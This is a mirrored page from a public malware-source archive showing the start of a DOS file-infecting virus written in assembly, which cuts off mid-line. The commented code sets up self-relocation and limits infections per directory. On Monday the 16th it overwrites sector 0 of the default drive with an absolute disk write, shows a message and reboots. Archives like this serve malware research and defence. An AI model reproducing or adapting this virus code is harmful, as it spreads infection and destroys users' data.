mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 07:55:28 +00:00
548 lines
16 KiB
NASM
548 lines
16 KiB
NASM
|
|
|||
|
CODE SEGMENT
|
|||
|
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
|
|||
|
|
|||
|
VTOP EQU $ ;Top of virus code
|
|||
|
|
|||
|
;Equates --------------------------------------------------------------------
|
|||
|
|
|||
|
VLENGTH EQU VBOT-VTOP ;Length of virus in bytes
|
|||
|
MAXINF EQU 3 ;Max files to infect in each directory
|
|||
|
VLPARA EQU (VLENGTH/16)+1 ;Virus length in paragraphs
|
|||
|
IDWORD EQU 0FFEEh ;ID word (for EXE files)
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
|
|||
|
LEA AX,[BP+(OFFSET(STACK1)+64)] ;Get stack pointer
|
|||
|
MOV SP,AX
|
|||
|
|
|||
|
CALL GETDELTA
|
|||
|
GETDELTA:
|
|||
|
POP BP
|
|||
|
SUB BP,OFFSET(GETDELTA) ;Find delta offset
|
|||
|
|
|||
|
PUSH DS
|
|||
|
PUSH ES ;Save original segment regs (EXE)
|
|||
|
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
PUSH CS
|
|||
|
POP ES ;Set up new segments
|
|||
|
|
|||
|
CLD ;Clear direction flag
|
|||
|
|
|||
|
LEA SI,[BP+OFFSET(ORIGBYT)]
|
|||
|
LEA DI,[BP+OFFSET(OLD_OB)]
|
|||
|
MOV CX,BCLEN
|
|||
|
REP MOVSB ;Shadow saved bytes into buffer
|
|||
|
|
|||
|
LEA SI,[BP+OFFSET(ORIG_IP)]
|
|||
|
LEA DI,[BP+OFFSET(ORIGIP)]
|
|||
|
MOV CX,4
|
|||
|
REP MOVSW ;Shadow EXE header information
|
|||
|
|
|||
|
MOV AH,2Ah ;Get date
|
|||
|
INT 21h
|
|||
|
|
|||
|
CMP AL,1 ;Monday?
|
|||
|
JNE NOTRIGGER ;If not, don't trigger
|
|||
|
|
|||
|
CMP DL,16 ;The 16th?
|
|||
|
JNE NOTRIGGER ;If not, don't trigger
|
|||
|
|
|||
|
MOV AH,19h ;Get default drive
|
|||
|
INT 21h
|
|||
|
|
|||
|
LEA BX,[BP+OFFSET(REBOOTCOD)] ;Offset of reboot code
|
|||
|
MOV CX,1 ;Number of sectors to write
|
|||
|
XOR DX,DX ;Start at absolute sector 0
|
|||
|
|
|||
|
INT 26h ;Absolute disk write
|
|||
|
JC WRITE_ERROR ;Skip POPF if error
|
|||
|
|
|||
|
POPF ;Pop flags (after INT 26h return)
|
|||
|
WRITE_ERROR:
|
|||
|
LEA DX,[BP+OFFSET(MESSAGE)] ;Display message
|
|||
|
MOV AH,9 ;Print string
|
|||
|
INT 21h
|
|||
|
|
|||
|
INT 05h ;Print screen
|
|||
|
|
|||
|
XOR AH,AH ;Read keyboard
|
|||
|
INT 16h ;BIOS keyboard interrupt
|
|||
|
|
|||
|
JMP REBOOTCOD ;Reboot the machine
|
|||
|
NOTRIGGER:
|
|||
|
LEA SI,[BP+OFFSET(ORIGDIR)] ;Save original directory name
|
|||
|
XOR DL,DL ;from current drive
|
|||
|
|
|||
|
MOV AH,47h ;Get current directory
|
|||
|
INT 21h
|
|||
|
DIRSCAN:
|
|||
|
LEA SI,[BP+OFFSET(OLDDIR)] ;Save old directory name
|
|||
|
XOR DL,DL ;from current drive
|
|||
|
|
|||
|
MOV AH,47h ;Get current directory
|
|||
|
INT 21h
|
|||
|
|
|||
|
MOV AX,WORD PTR [BP+OFFSET(OLDDIR)] ;Get first 2 bytes of old DIR
|
|||
|
CMP AX,'\ |